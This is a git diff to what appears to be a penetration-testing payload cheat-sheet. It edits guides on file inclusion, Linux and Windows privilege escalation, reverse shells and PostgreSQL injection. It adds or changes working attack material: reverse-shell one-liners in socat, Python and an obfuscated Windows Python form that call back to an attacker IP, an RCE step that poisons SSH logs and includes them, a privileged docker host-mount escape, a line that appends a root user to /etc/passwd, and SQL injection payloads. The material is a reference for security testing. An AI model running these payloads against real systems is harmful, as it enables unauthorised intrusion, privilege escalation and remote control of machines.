diff --git a/File Inclusion/README.md b/File Inclusion/README.md index fe79d7e0..255a83d7 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -291,6 +291,20 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log ``` +### RCE via SSH + +Try to ssh into the box with a PHP code as username ``. + +```powershell +ssh @10.10.10.10 +``` + +Then include the SSH log files inside the Web Application. + +```powershell +http://example.com/index.php?page=/var/log/auth.log&cmd=id +``` + ### RCE via Mail First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index f017fae4..de88808f 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -187,11 +187,19 @@ Check inside the file, to find other paths with write permissions. /etc/cron.weekly /etc/sudoers /etc/exports -/etc/at.allow -/etc/at.deny /etc/anacrontab /var/spool/cron /var/spool/cron/crontabs/root + +crontab -l +ls -alh /var/spool/cron; +ls -al /etc/ | grep cron +ls -al /etc/cron* +cat /etc/cron* +cat /etc/at.allow +cat /etc/at.deny +cat /etc/cron.allow +cat /etc/cron.deny* ``` ## Systemd timers @@ -514,6 +522,12 @@ $> docker run -it --rm -v $PWD:/mnt bash $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd ``` +Almost similar but you will also see all processes running on the host and be connected to the same NICs. + +```powershell +docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash +``` + Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell ```powershell @@ -584,6 +598,7 @@ Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 echo 0 > /proc/sys/vm/dirty_writeback_centisecs g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs +https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c ``` ### CVE-2010-3904 (RDS) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index e08aff05..57e24be4 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -55,7 +55,7 @@ nc -u -lvp 4242 ```powershell user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 -user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242 +user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4242 ``` Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat) @@ -78,12 +78,12 @@ Linux only IPv4 ```python -export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +export RHOST="10.10.10.10";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ``` IPv4 ```python -python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` IPv6 @@ -98,7 +98,7 @@ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC Windows only ```powershell -C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.10.10', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" ``` ### PHP diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 83de0f52..8700ea7c 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -15,9 +15,11 @@ * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Runas](#eop---runas) -* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures) +* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato) * [MS08-067 (NetAPI)](#ms08-067-netapi) + * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) + * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) @@ -264,6 +266,8 @@ C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml ``` +Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`. + Example content ```powershell @@ -668,6 +672,23 @@ python ms08-067.py 10.0.0.1 6 445 ``` +### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 + +'KiTrap0D' User Mode to Ring Escalation (MS10-015) + +```powershell +https://www.exploit-db.com/exploits/11199 + +Metasploit : exploit/windows/local/ms10_015_kitrap0d +``` + +### MS11-080 (afd.sys) - Microsoft Windows XP/2003 + +```powershell +Python: https://www.exploit-db.com/exploits/18176 +Metasploit: exploit/windows/local/ms11_080_afdjoinleaf +``` + ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) Check if the patch is installed : `wmic qfe list | findstr "3139914"` diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index e8880db8..69740cc2 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -1,4 +1,15 @@ -# POSTGRESQL +# PostgreSQL injection + +## Summary + +* [PostgreSQL Comments](#postgresql-comments) +* [PostgreSQL Error Based](#postgresql-error-based) +* [PostgreSQL Blind](#postgresql-blind) +* [PostgreSQL Time Based](#postgresql-time-based) +* [PostgreSQL File Read](#postgresql-file-read) +* [PostgreSQL File Write](#postgresql-file-write) +* [PostgreSQL Command execution](#postgresql-command-execution) +* [References](#references) ## PostgreSQL Comments @@ -7,7 +18,7 @@ /**/ ``` -## PostgreSQL Error Based - Basic +## PostgreSQL Error Based ```sql ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) @@ -16,6 +27,13 @@ ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) ``` +## PostgreSQL Blind + +```sql +' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK +' and substr(version(),1,10) = 'PostgreXXX' and '1 -> KO +``` + ## PostgreSQL Time Based ```sql @@ -47,7 +65,7 @@ SELECT * FROM pentestlab; COPY pentestlab(t) TO '/tmp/pentestlab'; ``` -## PostgreSQL - Command execution +## PostgreSQL Command execution CVE-2019–9193, can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. @@ -64,4 +82,5 @@ DROP TABLE IF EXISTS cmd_exec; -- [Optional] Remove the table ## References * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) -* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) \ No newline at end of file +* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) +* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) \ No newline at end of file diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 87913ec4..e238323a 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -19,6 +19,17 @@ Attempting to manipulate SQL queries may have goals including: * [Entry point detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [SQL injection using SQLmap](#sql-injection-using-sqlmap) + * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) + * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) + * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie) + * [Second order injection](#second-order-injection) + * [Shell](#shell) + * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) + * [Using TOR with SQLmap](#using-tor-with-sqlmap) + * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) + * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) + * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) + * [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list) * [Authentication bypass](#authentication-bypass) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection)